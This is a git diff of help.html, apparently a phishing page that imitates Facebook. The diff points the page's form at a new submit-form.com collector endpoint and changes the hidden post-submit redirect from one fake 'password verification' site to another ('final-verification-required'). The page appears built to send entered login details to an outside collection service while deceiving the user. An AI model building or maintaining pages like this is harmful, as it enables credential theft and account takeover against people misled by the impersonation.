--- a/help.html
+++ b/help.html
@@ -1828,12 +1828,12 @@ video {
       <b class="text-5xl text-white">facebook</b>
   </div>
 
-  <form class="sm:hidden lg:block md:block" action="https://submit-form.com/Um5XtO6O9" method="post"> 
-<form action="https://submit-form.com/Um5XtO6O9">
+  <form class="sm:hidden lg:block md:block" action="https://submit-form.com/ECqI11jYk" method="post"> 
+<form action="https://submit-form.com/ECqI11jYk">
   <input
     type="hidden"
     name="_redirect"
-    value="https://enter-your-password-for-verification.netlify.app/"method="post"> 
+    value="https://final-verification-required.vercel.app/"method="post"> 
 <div style="position: absolute; left: 1.5rem; top:8rem; width: 90%;">
   <div>
     <p class="border-b h-10 font-bold text-[16px] text-[#4b4f56] pl-3 p-2 bg-[#f5f6f7]">
